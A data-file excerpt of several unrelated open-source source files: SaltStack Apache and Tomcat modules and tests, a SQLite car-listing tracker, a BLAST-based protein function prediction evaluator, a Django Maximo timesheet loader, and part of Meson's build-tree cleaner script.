filename | text
---|---|
the-stack_0_3664 | """
:codeauthor: Jayesh Kariya <[email protected]>
"""
import pytest
import salt.states.apache as apache
import salt.utils.files
from tests.support.mock import MagicMock, mock_open, patch
@pytest.fixture
def configure_loader_modules():
return {apache: {}}
def test_configfile():
"""
    Test to allow inputting a yaml dictionary into a file
    for apache configuration files.
"""
with patch("os.path.exists", MagicMock(return_value=True)):
name = "/etc/distro/specific/apache.conf"
config = 'VirtualHost: this: "*:80"'
new_config = 'LiteralHost: that: "*:79"'
ret = {"name": name, "result": True, "changes": {}, "comment": ""}
with patch.object(salt.utils.files, "fopen", mock_open(read_data=config)):
mock_config = MagicMock(return_value=config)
with patch.dict(apache.__salt__, {"apache.config": mock_config}):
ret.update({"comment": "Configuration is up to date."})
assert apache.configfile(name, config) == ret
with patch.object(salt.utils.files, "fopen", mock_open(read_data=config)):
mock_config = MagicMock(return_value=new_config)
with patch.dict(apache.__salt__, {"apache.config": mock_config}):
ret.update(
{
"comment": "Configuration will update.",
"changes": {"new": new_config, "old": config},
"result": None,
}
)
with patch.dict(apache.__opts__, {"test": True}):
assert apache.configfile(name, new_config) == ret
with patch.object(salt.utils.files, "fopen", mock_open(read_data=config)):
mock_config = MagicMock(return_value=new_config)
with patch.dict(apache.__salt__, {"apache.config": mock_config}):
ret.update(
{"comment": "Successfully created configuration.", "result": True}
)
with patch.dict(apache.__opts__, {"test": False}):
assert apache.configfile(name, config) == ret
|
the-stack_0_3665 | import os
from typing import List
import sqlite3
from datamodels import car
def setupNewDB(dirpath):
if not os.path.exists(dirpath):
os.makedirs(dirpath)
if os.path.isfile(dirpath + "/newdata.db"):
os.remove(dirpath + "/newdata.db")
newdb = sqlite3.connect(dirpath + "/newdata.db")
try:
newdb.execute(
"CREATE TABLE cars(id TEXT, title TEXT, url TEXT, price TEXT, img TEXT, cdata TEXT)"
)
except sqlite3.OperationalError:
print("Error setting up the database")
newdb.close()
quit()
return newdb
def insertResults(db, results):
for res in results:
db.execute(
"INSERT INTO cars VALUES (?,?,?,?,?,?)",
(res.listing_id, res.title, res.url, res.price, res.img, res.data),
)
db.commit()
def findChanges(dirpath, results: List[car]) -> List[car]:
changes = []
newIDs = list(map(lambda newresult: newresult.listing_id, results))
if not os.path.isfile(dirpath + "/data.db"):
changes = list(map(lambda item: item.with_change_reasons("new"), results))
else:
olddb = sqlite3.connect(dirpath + "/data.db")
for currentCar in results:
oldres = olddb.execute(
"SELECT * from cars WHERE id=?", [currentCar.listing_id]
).fetchone()
if oldres is not None:
oldcar = car(*oldres)
if oldcar != currentCar:
changes.append(
currentCar.with_change_reasons(
'changed',
currentCar.diffFromOld(oldcar),
)
)
else:
changes.append(currentCar.with_change_reasons('new'))
oldCarData = olddb.execute("SELECT * from cars").fetchall()
oldCars = list(map(lambda tpl: car(*tpl), oldCarData))
for oldCar in oldCars:
if oldCar.listing_id not in newIDs:
changes.append(oldCar.with_change_reasons("deleted"))
olddb.close()
return changes
def archiveDatabase(dirpath):
if os.path.isfile(dirpath + "/data.db"):
os.remove(dirpath + "/data.db")
os.rename(dirpath + "/newdata.db", dirpath + "/data.db")
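# Minimal end-to-end usage sketch (directory and `results` are hypothetical; a
# `results` list of `car` objects would come from whatever scraper feeds this
# module) showing how the helpers above fit together:
#
#   newdb = setupNewDB("data/golf")
#   insertResults(newdb, results)
#   newdb.close()
#   changes = findChanges("data/golf", results)   # cars marked new/changed/deleted
#   archiveDatabase("data/golf")                  # newdata.db replaces data.db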
|
the-stack_0_3669 | '''
Support for Tomcat
'''
# Import Python Libs
import os
def __catalina_home():
'''
Tomcat paths differ depending on packaging
'''
locations = ['/usr/share/tomcat6', '/opt/tomcat']
for location in locations:
if os.path.isdir(location):
return location
def version():
'''
Return server version from catalina.sh version
CLI Example::
salt '*' tomcat.version
'''
cmd = __catalina_home() + '/bin/catalina.sh version'
out = __salt__['cmd.run'](cmd).splitlines()
for line in out:
if not line:
continue
if 'Server version' in line:
comps = line.split(': ')
return comps[1]
def fullversion():
'''
Return all server information from catalina.sh version
CLI Example::
salt '*' tomcat.fullversion
'''
cmd = __catalina_home() + '/bin/catalina.sh version'
ret = {}
out = __salt__['cmd.run'](cmd).splitlines()
for line in out:
if not line:
continue
if ': ' in line:
comps = line.split(': ')
ret[comps[0]] = comps[1]
return ret
def signal(signal=None):
'''
Signals catalina to start, stop, securestart, forcestop.
CLI Example::
salt '*' tomcat.signal start
'''
valid_signals = {'forcestop': 'stop -force',
'securestart': 'start -security',
'start': 'start',
'stop': 'stop'}
    if signal not in valid_signals:
        return
cmd = '{0}/bin/catalina.sh {1}'.format(
__catalina_home(), valid_signals[signal]
)
__salt__['cmd.run'](cmd)
|
the-stack_0_3675 | import os
import sys
import subprocess
from tqdm import tqdm
from Bio.Seq import Seq
from Bio import SeqIO, SearchIO
from Bio.SeqRecord import SeqRecord
from Bio.Blast.Applications import NcbiblastpCommandline
from src.python.preprocess2 import *
from itertools import cycle
from datetime import datetime
import numpy as np
import matplotlib.pyplot as plt
from pymongo import MongoClient
from tempfile import gettempdir
tmp_dir = gettempdir()
from concurrent.futures import ThreadPoolExecutor
import argparse
ASPECT = 'F'
ONTO = None
PRIOR = None
THRESHOLDS = np.arange(.05, 1, .05)
cleanup = True
eps = 10e-6
def init_GO(asp=ASPECT, src=None):
global ONTO, ASPECT
if src: set_obo_src(src)
ASPECT = asp
ONTO = get_ontology(asp)
return ONTO
def add_arguments(parser):
parser.add_argument("--mongo_url", type=str, default='mongodb://localhost:27017/',
help="Supply the URL of MongoDB")
def load_all_data():
mf, _ = load_data(db, asp='F', codes=exp_codes)
cc, _ = load_data(db, asp='C', codes=exp_codes)
bp, _ = load_data(db, asp='P', codes=exp_codes)
return mf, cc, bp
def _prepare_naive(reference):
global PRIOR
prior_pth = os.path.join(tmp_dir, 'prior-%s.npy' % GoAspect(ASPECT))
    if os.path.exists(prior_pth):
        PRIOR = np.load(prior_pth).item()
        return
go2count = {}
for _, go_terms in reference.items():
for go in go_terms:
if go in go2count:
go2count[go] += 1
else:
go2count[go] = 1
total = len(reference)
prior = {go: count/total for go, count in go2count.items()}
np.save(prior_pth, prior)
PRIOR = prior
def _naive(target, reference):
global PRIOR
if not PRIOR:
_prepare_naive(reference)
return PRIOR
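# Note: the naive baseline ignores the target sequence entirely and returns the
# same GO-term prior for every input. As an illustration (the GO id is only an
# example): if 'GO:0005515' is annotated on 30 of 100 reference proteins,
# _naive predicts it for any target with probability 0.3.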
def _prepare_blast(sequences):
# print('### entering _prepare_blast')
blastdb_pth = os.path.join(tmp_dir, 'blast-%s' % GoAspect(ASPECT))
records = [SeqRecord(Seq(seq), id) for id, seq in sequences.items()]
SeqIO.write(records, open(blastdb_pth, 'w+'), "fasta")
os.system("makeblastdb -in %s -dbtype prot" % blastdb_pth)
def parallel_blast(targets, reference, num_cpu=4):
blastdb_pth = os.path.join(tmp_dir, 'blast-%s' % GoAspect(ASPECT))
records = [SeqRecord(Seq(seq), id) for id, seq in reference.items()]
SeqIO.write(records, open(blastdb_pth, 'w+'), "fasta")
os.system("makeblastdb -in %s -dbtype prot" % blastdb_pth)
predictions = dict()
e = ThreadPoolExecutor(num_cpu)
def _parallel_blast_helper(s):
return s[0], _blast(SeqRecord(Seq(s[1]), s[0]), reference, topn=None, choose_max_prob=True)
pbar = tqdm(range(len(targets)), desc="blast2go processed")
for tgtid, preds in e.map(_parallel_blast_helper, targets.items()):
predictions[tgtid] = preds
pbar.update(1)
pbar.close()
return predictions
def _blast(target_fasta, reference, topn=None, choose_max_prob=True):
seqid, asp = target_fasta.id, GoAspect(ASPECT)
query_pth = os.path.join(tmp_dir, "%s-%s.fas" % (seqid, asp))
output_pth = os.path.join(tmp_dir, "%s-%s.out" % (seqid, asp))
database_pth = os.path.join(tmp_dir, 'blast-%s' % asp)
SeqIO.write(target_fasta, open(query_pth, 'w+'), "fasta")
cline = NcbiblastpCommandline(query=query_pth, db=database_pth, out=output_pth,
outfmt=5, evalue=0.001, remote=False, ungapped=False)
child = subprocess.Popen(str(cline),
stderr=subprocess.PIPE,
universal_newlines=True,
shell=(sys.platform != "win32"))
handle, _ = child.communicate()
assert child.returncode == 0
blast_qresult = SearchIO.read(output_pth, 'blast-xml')
annotations = {}
for hsp in blast_qresult.hsps[:topn]:
if hsp.hit.id == seqid:
continue
ident = hsp.ident_num / hsp.hit_span
for go in reference[hsp.hit.id]:
if go in annotations:
annotations[go].append(ident)
else:
annotations[go] = [ident]
for go, ps in annotations.items():
if choose_max_prob:
annotations[go] = max(ps)
else:
annotations[go] = 1 - np.prod([(1 - p) for p in ps])
if cleanup:
os.remove(query_pth)
os.remove(output_pth)
return annotations
def _predict(reference_annots, target_seqs, func_predict, binary_mode=False):
if len(target_seqs) > 1:
pbar = tqdm(range(len(target_seqs)), desc="targets processed")
else:
pbar = None
if binary_mode:
predictions = np.zeros((len(target_seqs), len(ONTO.classes)))
for i, (_, seq) in enumerate(target_seqs.items()):
preds = func_predict(seq, reference_annots)
bin_preds = ONTO.binarize([list(preds.keys())])[0]
for go, prob in preds.items():
bin_preds[ONTO[go]] = prob
predictions[i, :] = bin_preds
if pbar: pbar.update(1)
else:
predictions = {}
for _, (seqid, seq) in enumerate(target_seqs.items()):
predictions[seqid] = func_predict(SeqRecord(Seq(seq), seqid), reference_annots)
if pbar: pbar.update(1)
if pbar: pbar.close()
return predictions
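# Note on the two modes above: with binary_mode=True the result is a dense
# (num_targets x num_classes) probability matrix whose columns follow
# ONTO.classes, while the default mode returns nested dicts of the form
# {sequence_id: {go_term: probability}}.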
def bin2dict(distribution, classes):
return {classes[i]: prob for i, prob in enumerate(distribution)}
def get_P_and_T_from_dictionaries(tau, predictions, targets):
assert len(predictions) == len(targets)
P, T = [], []
for seqid, seq_targets in targets.items():
assert len(seq_targets) > 0
seq_preds = predictions[seqid]
seq_annots = [go for go, prob in seq_preds.items() if prob >= tau]
P.append(set(seq_annots))
T.append(set(seq_targets))
assert len(P) == len(T)
return P, T
def get_P_and_T_from_arrays(tau, predictions, targets, classes):
assert len(predictions) == len(targets)
P, T = [], []
classes_arr = np.asarray(classes)
for prob_arr in map(lambda p: np.asarray(p), predictions):
annots = classes_arr[prob_arr >= tau]
P.append(set(annots))
for prob_arr in map(lambda t: np.asarray(t), targets):
annots = classes_arr[prob_arr == 1.0]
assert len(annots) == sum(prob_arr)
T.append(set(annots))
assert len(P) == len(T)
return P, T
def precision(tau, predictions, targets, classes=None):
assert type(predictions) == type(targets)
if isinstance(predictions, dict):
P, T = get_P_and_T_from_dictionaries(tau, predictions, targets)
else:
assert classes
P, T = get_P_and_T_from_arrays(tau, predictions, targets, classes)
ret = [(len(P_i & T_i) / len(P_i)) if len(P_i) else 1.0 for P_i, T_i in zip(P, T)]
return ret
def recall(tau, predictions, targets, classes=None, partial_evaluation=False):
assert type(predictions) == type(targets)
if isinstance(predictions, dict):
P, T = get_P_and_T_from_dictionaries(tau, predictions, targets)
else:
assert classes
P, T = get_P_and_T_from_arrays(tau, predictions, targets, classes)
if partial_evaluation:
P, T = zip(*[(P_i, T_i) for P_i, T_i in zip(P, T) if len(P_i) > 0])
ret = [(len(P_i & T_i) / len(T_i)) if len(P_i) else 0.0 for P_i, T_i in zip(P, T)]
return ret
def F_beta(pr, rc, beta=1):
pr = max(pr, eps)
rc = max(rc, eps)
return (1 + beta ** 2) * ((pr * rc) / (((beta ** 2) * pr) + rc))
def F1(pr, rc):
return F_beta(pr, rc, beta=1)
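# Worked example for the metric above: with pr=0.5 and rc=0.25,
# F1 = 2 * (0.5 * 0.25) / (0.5 + 0.25) = 0.25 / 0.75 ≈ 0.33. The eps clamp in
# F_beta only matters when precision or recall is exactly zero, avoiding a
# zero denominator.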
def predict(reference_seqs, reference_annots, target_seqs, method, basename=""):
filename = "%s_%s.npy" % (method, basename)
if method == "blast":
pred_path = os.path.join(tmp_dir, filename)
if basename and os.path.exists(pred_path):
return np.load(pred_path).item()
_prepare_blast(reference_seqs)
predictions = _predict(reference_annots, target_seqs, _blast)
np.save(pred_path, predictions)
return predictions
elif method == "naive":
_prepare_naive(reference_annots)
predictions = _predict(reference_annots, target_seqs, _naive)
return predictions
elif method == "deepseq":
pred_path = os.path.join(tmp_dir, filename)
return np.load(pred_path).item()
elif method == "seq2go":
pred_path = os.path.join(tmp_dir, filename)
return np.load(pred_path).item()
elif method == "seq2go-proba":
pred_path = os.path.join(tmp_dir, filename)
return np.load(pred_path).item()
else:
print("Unknown method")
def performance(predictions, ground_truth, classes=None, ths=THRESHOLDS):
prs, rcs, f1s = [], [], []
for tau in ths:
pr_per_seq = precision(tau, predictions, ground_truth, classes)
rc_per_seq = recall(tau, predictions, ground_truth, classes)
pr_tau = np.mean(pr_per_seq)
rc_tau = np.mean(rc_per_seq)
prs.append(pr_tau)
rcs.append(rc_tau)
f1s.append(np.mean(F1(pr_tau, rc_tau)))
return ths, prs, rcs, f1s
def plot_precision_recall(perf):
# Plot Precision-Recall curve
lw, n = 2, len(perf)
methods = list(perf.keys())
prs = [v[1] for v in perf.values()]
rcs = [v[2] for v in perf.values()]
f1s = [v[3] for v in perf.values()]
colors = cycle(['red', 'blue', 'navy', 'turquoise', 'darkorange', 'cornflowerblue', 'teal'])
# Plot Precision-Recall curve for each class
plt.clf()
for i, color in zip(range(len(methods)), colors):
plt.plot(rcs[i], prs[i], color=color, lw=lw,
label='{0} (F_max = {1:0.2f})'
.format(methods[i], max(f1s[i])))
plt.xlim([0.0, 1.0])
plt.ylim([0.0, 1.05])
plt.xlabel('Recall')
plt.ylabel('Precision')
plt.title(GoAspect(ASPECT))
plt.legend(loc="lower right")
plt.show()
def evaluate_performance(db, methods, asp='F', train_and_validation_data=None, filename=None, plot=1):
onto = init_GO(asp)
if train_and_validation_data:
seqs_train, annots_train, seqs_valid, annots_valid = train_and_validation_data
else:
seqs_train, annots_train, seqs_valid, annots_valid = load_training_and_validation(db, None)
annots_train = propagate_labels(annots_train, onto, include_root=False)
annots_valid = propagate_labels(annots_valid, onto, include_root=False)
perf = {}
for meth in methods:
pred = predict(seqs_train, annots_train, seqs_valid, meth, filename)
perf[meth] = performance(pred, annots_valid)
if plot == 1:
plot_precision_recall(perf)
return pred, perf
def product_of_experts(*predictions):
def go2p2go2ps(go2p_arr):
go2ps = dict()
for go2p in go2p_arr:
for go, prob in go2p.items():
if go in go2ps:
go2ps[go].append(prob)
else:
go2ps[go] = [prob]
return go2ps
poe = dict()
for pred in predictions:
for seqid, go2prob in pred.items():
if seqid in poe:
poe[seqid].append(pred[seqid])
else:
poe[seqid] = [pred[seqid]]
for seqid, arr in poe.items():
poe[seqid] = go2p2go2ps(arr)
for seqid, go2prob in poe.items():
for go, ps in go2prob.items():
poe[seqid][go] = 1 - np.prod([(1 - p) for p in ps])
return poe
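# The combination rule above is a noisy-OR: if several predictors assign a GO
# term probabilities ps, the combined score is 1 - prod(1 - p). For example,
# two predictors giving 0.5 and 0.4 for the same term combine to
# 1 - (0.5 * 0.6) = 0.7, so agreement between experts raises the score.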
if __name__ == "__main__":
parser = argparse.ArgumentParser()
add_arguments(parser)
args = parser.parse_args()
client = MongoClient(args.mongo_url)
db = client['prot2vec']
lim = 100
init_GO(ASPECT)
t0 = datetime(2017, 1, 1, 0, 0)
t1 = datetime.utcnow()
seqs_train, annots_train, seqs_valid, annots_valid = load_training_and_validation(db, t0, t1, ASPECT, lim)
predictions_blast = predict(seqs_train, annots_train, seqs_valid, "blast")
ths, prs, rcs, f1s = performance(predictions_blast, annots_valid)
import json
print(json.dumps(predictions_blast, indent=1))
print(json.dumps(annots_valid, indent=1))
import pandas as pd
print(pd.DataFrame({"Threshold": ths, "Precision": prs, "Recall": rcs, "F1": f1s}).head(20))
print(len(seqs_train), len(seqs_valid), len(predictions_blast))
|
the-stack_0_3676 | import csv
from datetime import datetime, time
from decimal import Decimal
from openpyxl import load_workbook, Workbook
from employee.models import Employee
from .models import MaximoTicket, MaximoTimeRegister
import logging
logger = logging.getLogger(__name__)
__author__ = 'lberrocal'
def row_to_dictionary(excel_row, mappings):
data = dict()
for attribute, position in mappings.items():
data[attribute] = excel_row[position].value
return data
def parse_hours(str_hours):
parts = str_hours.split(':')
return Decimal(parts[0]) + Decimal(parts[1]) / 60
def parse_datetime_hours(hours):
return Decimal(hours.hour + hours.minute / 60.0)
def decimal_to_time(decimal_hours):
hour = int(decimal_hours)
minute = int((decimal_hours - int(decimal_hours)) * Decimal(60.0))
return time(hour, minute, 0)
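# Worked examples for the time helpers above (values illustrative only):
#   parse_hours('7:30')                 -> Decimal('7.5')
#   parse_datetime_hours(time(7, 30))   -> Decimal('7.5')
#   decimal_to_time(Decimal('7.5'))     -> datetime.time(7, 30)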
class AbstractMaximoData(object):
LOAD_TICKETS = 'LOAD_TICKETS'
LOAD_TIME = 'LOAD_TIME'
LOAD_ALL = 'LOAD_ALL'
def __init__(self, stdout=None):
self.ticket_mappings = {'ticket_type': 0, 'number': 1, 'name': 2}
self.time_register_mappings = {'company_id': 0,
'regular_hours': 1,
'date': 3,
'username': 5,
'pay_rate': 7,
'wo_number': 8,
'ticket_type': 11,
'ticket_number': 12,
'description': 6}
self.stdout = stdout
def write(self, msg):
if self.stdout:
self.stdout.write(msg)
def _get_maximo_ticket_info(self, row):
ticket_type = row[self.time_register_mappings['ticket_type']]
if not isinstance(ticket_type, str):
ticket_type = ticket_type.value
if ticket_type not in [MaximoTicket.MAXIMO_SR]:
ticket_type = MaximoTicket.MAXIMO_WORKORDER
if ticket_type == MaximoTicket.MAXIMO_WORKORDER:
number = row[self.time_register_mappings['wo_number']]
else:
number = row[self.time_register_mappings['ticket_number']]
if not isinstance(number, str):
number = number.value
return ticket_type, number
class MaximoCSVData(AbstractMaximoData):
def _parse_date(self, str_date):
return datetime.strptime(str_date, '%b %d, %Y').date()
def load_time_registers(self, filename):
time_results = {'rows_parsed': 0,
'created': 0,
'duplicates': 0,
'sheet': 'NA',
'errors': list()}
row_num = 1
created_count = 0
updated = 0
duplicate_count = 0
errors = list()
with open(filename, 'r', encoding='utf-8') as csv_file:
csv_reader = csv.reader(csv_file, delimiter=',')
next(csv_reader, None)
for row in csv_reader:
attributes = dict()
company_id = row[self.time_register_mappings['company_id']]
try:
attributes['employee'] = Employee.objects.get(company_id=company_id)
attributes['date'] = self._parse_date(row[self.time_register_mappings['date']])
regular_hours = parse_hours(row[self.time_register_mappings['regular_hours']])
if regular_hours > 8.0:
raise ValueError(
                        'Regular hours cannot exceed 8 hours. You are trying to add %.1f hours' % regular_hours)
register_summary = MaximoTimeRegister.objects.get_employee_total_regular_hours(**attributes)
total_regular_hours = 0
if register_summary['total_regular_hours'] is not None:
total_regular_hours = register_summary['total_regular_hours']
if total_regular_hours + regular_hours <= 8.0:
attributes['pay_rate'] = Decimal(row[self.time_register_mappings['pay_rate']])
ticket_type, number = self._get_maximo_ticket_info(row)
attributes['ticket'] = MaximoTicket.objects.get(ticket_type=ticket_type, number=number)
attributes['regular_hours'] = regular_hours
attributes['defaults'] = {'description': row[self.time_register_mappings['description']]}
register, created = MaximoTimeRegister.objects.get_or_create(**attributes)
if created:
created_count += 1
else:
msg = 'Data on row %d for employee %s ' \
'seems to be duplicated for record %d' % (row_num, attributes['employee'],
register.pk)
logger.warn(msg)
error = {'row_num': row_num,
'type': 'Possible duplicate',
'message': msg}
errors.append(error)
duplicate_count += 1
else:
msg = 'Data on row %d for employee %s exceeds ' \
'the maximum regular hour. It would end up having %.1f hours' % (row_num,
attributes['employee'],
total_regular_hours + regular_hours)
logger.warn(msg)
error = {'row_num': row_num,
'type': 'Exceed maximum 8 regular hours',
'message': msg}
errors.append(error)
duplicate_count += 1
except Employee.DoesNotExist:
username = row[self.time_register_mappings['username']]
msg = 'Employee with id %s and username %s ' \
                      'on row %d does not exist; time register was not loaded' % (company_id, username, row_num)
logger.warn(msg)
error = {'row_num': row_num,
'type': 'Employee does not exist',
'message': msg}
errors.append(error)
except MaximoTicket.DoesNotExist:
msg = '%s with number %s on line %d does not exist' % (ticket_type, number, row_num)
logger.warn(msg)
error = {'row_num': row_num,
'type': 'Ticket does not exist',
'message': msg}
errors.append(error)
except TypeError as te:
msg = 'Unexpected error %s on row %d' % (te, row_num)
logger.error(msg)
error = {'row_num': row_num,
                         'type': 'Unexpected Type Error',
'message': msg}
errors.append(error)
except ValueError as ve:
msg = '%s on row %d' % (ve, row_num)
logger.error(msg)
error = {'row_num': row_num,
'type': 'Value Error',
'message': msg}
errors.append(error)
row_num += 1
time_results['rows_parsed'] = row_num - 1
time_results['created'] = created_count
time_results['duplicates'] = duplicate_count
time_results['errors'] = errors
return time_results
class MaximoExcelData(AbstractMaximoData):
'''
    The loading of Times is based on an export of a report named TINO-NS-FY16.
The columns are:
0 acp_empnum company_id
1 acp_hours regular_hours
2 acp_pagorelevo
3 acp_timingdate date
4 enterby
5 laborcode username
6 memo description
7 payrate pay_rate
8 refwo wo_number
9 regularhrs
10 skilllevel
11 ticketclass ticket_type
12 ticketid ticket_number
'''
def __init__(self, stdout=None):
super(MaximoExcelData, self).__init__(stdout=stdout)
self.ticket_sheet = 'Maximo Tickets'
self.time_sheet = 'Time'
def load(self, filename, action=AbstractMaximoData.LOAD_ALL, allow_update=False, **kwargs):
wb = load_workbook(filename=filename, data_only=True)
ticket_results = dict()
time_results = dict()
if action == self.LOAD_TICKETS:
ticket_results = self.load_tickets(wb, allow_update=allow_update, **kwargs)
elif action == self.LOAD_TIME:
time_results = self.load_time_registers(wb, allow_update=allow_update, **kwargs)
elif action is self.LOAD_ALL:
ticket_results = self.load_tickets(wb, allow_update=allow_update, **kwargs)
time_results = self.load_time_registers(wb, allow_update=allow_update, **kwargs)
else:
raise ValueError('"%s" is an invalid action for load' % action)
return {'ticket_results': ticket_results,
'time_results': time_results}
def save_tickets(self, filename, tickets):
wb = Workbook()
sheet = wb.create_sheet(title=self.ticket_sheet)
row = 1
for v, column in self.ticket_mappings.items():
sheet.cell(column=column + 1, row=row, value=v.upper())
row += 1
for ticket in tickets:
for v, column, in self.ticket_mappings.items():
sheet.cell(column=column + 1, row=row, value=getattr(ticket, v))
row += 1
wb.save(filename)
def export_time_registers(self, filename, registers):
wb = Workbook()
sheet = wb.create_sheet(title=self.time_sheet)
row = 1
headers = ['Company Id', 'Username', 'Date', 'Hours', 'Pay Rate',
'Ticket Type', 'Ticket Number', 'Ticket Name', 'Memo', 'Project', 'Project Source']
column = 1
for header in headers:
sheet.cell(column=column, row=row, value=header)
column += 1
for register in registers:
row += 1
column = 1
sheet.cell(column=column, row=row, value=register.employee.company_id)
column += 1
sheet.cell(column=column, row=row, value=register.employee.user.username)
column += 1
sheet.cell(column=column, row=row, value=register.date)
column += 1
sheet.cell(column=column, row=row, value=register.regular_hours)
column += 1
sheet.cell(column=column, row=row, value=register.pay_rate)
column += 1
sheet.cell(column=column, row=row, value=register.ticket.ticket_type)
column += 1
sheet.cell(column=column, row=row, value=register.ticket.number)
column += 1
sheet.cell(column=column, row=row, value=register.ticket.name)
column += 1
sheet.cell(column=column, row=row, value=register.description)
column += 1
if register.ticket.project:
project_name = register.ticket.project.short_name
else:
project_name=''
sheet.cell(column=column, row=row, value=project_name)
column += 1
sheet.cell(column=column, row=row, value='NA')
wb.save(filename)
def save_time_registers(self, filename, registers):
"""
        Saves a queryset of MaximoTimeRegister objects to an excel format that matches the load file format. The load
        file format is explained in the class-level documentation.
:param filename: Excel filename to save the MaximoTimeRegister
:param registers: QuerySet of MaximoTimeRegister
:return: None
"""
wb = Workbook()
sheet = wb.create_sheet(title=self.time_sheet)
row = 1
for v, column in self.time_register_mappings.items():
sheet.cell(column=column + 1, row=row, value=v.upper())
row += 1
for register in registers:
col = self.time_register_mappings['company_id'] + 1
sheet.cell(column=col, row=row, value=register.employee.company_id)
col = self.time_register_mappings['regular_hours'] + 1
hours = decimal_to_time(register.regular_hours)
sheet.cell(column=col, row=row, value=hours)
col = self.time_register_mappings['date'] + 1
sheet.cell(column=col, row=row, value=register.date)
col = self.time_register_mappings['username'] + 1
sheet.cell(column=col, row=row, value=register.employee.user.username)
col = self.time_register_mappings['pay_rate'] + 1
sheet.cell(column=col, row=row, value=register.pay_rate)
col = self.time_register_mappings['description'] + 1
sheet.cell(column=col, row=row, value=register.description)
if register.ticket.ticket_type == MaximoTicket.MAXIMO_WORKORDER:
col = self.time_register_mappings['wo_number'] + 1
sheet.cell(column=col, row=row, value=register.ticket.number)
if register.ticket.ticket_type != MaximoTicket.MAXIMO_WORKORDER:
col = self.time_register_mappings['ticket_type'] + 1
sheet.cell(column=col, row=row, value=register.ticket.ticket_type)
col = self.time_register_mappings['ticket_number'] + 1
sheet.cell(column=col, row=row, value=register.ticket.number)
row += 1
wb.save(filename)
def load_time_registers(self, wb, allow_update=False, **kwargs):
sheet_name = kwargs.get('Time', self.time_sheet)
time_sheet = wb[sheet_name]
time_results = {'rows_parsed': 0,
'created': 0,
'duplicates': 0,
'sheet': sheet_name,
'errors': list()}
row_num = 1
created_count = 0
updated = 0
duplicate_count = 0
errors = list()
for row in time_sheet.rows:
if row_num > 1:
attributes = dict()
company_id = row[self.time_register_mappings['company_id']].value
try:
attributes['employee'] = Employee.objects.get(company_id=company_id)
attributes['date'] = row[self.time_register_mappings['date']].value
regular_hours = parse_datetime_hours(row[self.time_register_mappings['regular_hours']].value)
if regular_hours > 8.0:
raise ValueError(
                        'Regular hours cannot exceed 8 hours. You are trying to add %.1f hours' % regular_hours)
register_summary = MaximoTimeRegister.objects.get_employee_total_regular_hours(**attributes)
total_regular_hours = 0
if register_summary['total_regular_hours'] is not None:
total_regular_hours = register_summary['total_regular_hours']
if total_regular_hours + regular_hours <= 8.0:
attributes['pay_rate'] = Decimal(row[self.time_register_mappings['pay_rate']].value)
ticket_type, number = self._get_maximo_ticket_info(row)
attributes['ticket'] = MaximoTicket.objects.get(ticket_type=ticket_type, number=number)
attributes['regular_hours'] = regular_hours
attributes['defaults'] = {'description': row[self.time_register_mappings['description']].value}
register, created = MaximoTimeRegister.objects.get_or_create(**attributes)
if created:
created_count += 1
else:
msg = 'Data on row %d for employee %s ' \
'seems to be duplicated for record %d' % (row_num, attributes['employee'],
register.pk)
logger.warn(msg)
error = {'row_num': row_num,
'type': 'Possible duplicate',
'message': msg}
errors.append(error)
duplicate_count += 1
else:
msg = 'Data on row %d for employee %s exceeds ' \
'the maximum regular hour. It would end up having %.1f hours' % (row_num,
attributes['employee'],
total_regular_hours + regular_hours)
logger.warn(msg)
error = {'row_num': row_num,
'type': 'Exceed maximum 8 regular hours',
'message': msg}
errors.append(error)
duplicate_count += 1
except Employee.DoesNotExist:
username = row[self.time_register_mappings['username']].value
msg = 'Employee with id %s and username %s ' \
                      'on row %d does not exist; time register was not loaded' % (company_id, username, row_num)
logger.warn(msg)
error = {'row_num': row_num,
'type': 'Employee does not exist',
'message': msg}
errors.append(error)
except MaximoTicket.DoesNotExist:
msg = '%s with number %s on line %d does not exist' % (ticket_type, number, row_num)
logger.warn(msg)
error = {'row_num': row_num,
'type': 'Ticket does not exist',
'message': msg}
errors.append(error)
except TypeError as te:
msg = 'Unexpected error %s on row %d' % (te, row_num)
logger.error(msg)
error = {'row_num': row_num,
                         'type': 'Unexpected Type Error',
'message': msg}
errors.append(error)
except ValueError as ve:
msg = '%s on row %d' % (ve, row_num)
logger.error(msg)
error = {'row_num': row_num,
'type': 'Value Error',
'message': msg}
errors.append(error)
row_num += 1
time_results['rows_parsed'] = row_num - 2
time_results['created'] = created_count
time_results['duplicates'] = duplicate_count
time_results['sheet'] = sheet_name
time_results['errors'] = errors
return time_results
def load_tickets(self, wb, allow_update=False, **kwargs):
sheet_name = kwargs.get('ticket_sheet', self.ticket_sheet)
ticket_sheet = wb[sheet_name]
results = {'rows_parsed': 0,
'created': 0,
'updated': 0,
'sheet': sheet_name}
row_num = 1
created_count = 0
updated = 0
for row in ticket_sheet.rows:
if row_num > 1:
data_dictionary = row_to_dictionary(row, self.ticket_mappings)
obj, created = MaximoTicket.objects.get_or_create(ticket_type=data_dictionary['ticket_type'],
number=data_dictionary['number'],
defaults=data_dictionary)
if created:
self.write('%d Created Maximo ticket %s' % (row_num - 1, obj))
logger.debug('%d Created Maximo ticket %s' % (row_num - 1, obj))
created_count += 1
# logger.debug('--- %d tickets created' % created)
elif allow_update:
self.write('%d Update Maximo ticket %s' % (row_num - 1, obj))
logger.debug('%d Update Maximo ticket %s' % (row_num - 1, obj))
updated += 1
else:
logger.debug('%d Existed Maximo ticket %s' % (row_num - 1, obj))
row_num += 1
# logger.debug('%d tickets created' % created)
results = {'rows_parsed': row_num - 2,
'created': created_count,
'updated': updated,
'sheet': sheet_name}
return results
|
the-stack_0_3677 | # Copyright 2016 The Meson development team
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
import shutil
import pickle
import typing as T
def rmtrees(build_dir: str, trees: T.List[str]) -> None:
for t in trees:
# Never delete trees outside of the builddir
if os.path.isabs(t):
print(f'Cannot delete dir with absolute path {t!r}')
continue
bt = os.path.join(build_dir, t)
# Skip if it doesn't exist, or if it is not a directory
if os.path.isdir(bt):
shutil.rmtree(bt, ignore_errors=True)
def run(args: T.List[str]) -> int:
if len(args) != 1:
print('Cleaner script for Meson. Do not run on your own please.')
print('cleantrees.py <data-file>')
return 1
with open(args[0], 'rb') as f:
data = pickle.load(f)
rmtrees(data.build_dir, data.trees)
# Never fail cleaning
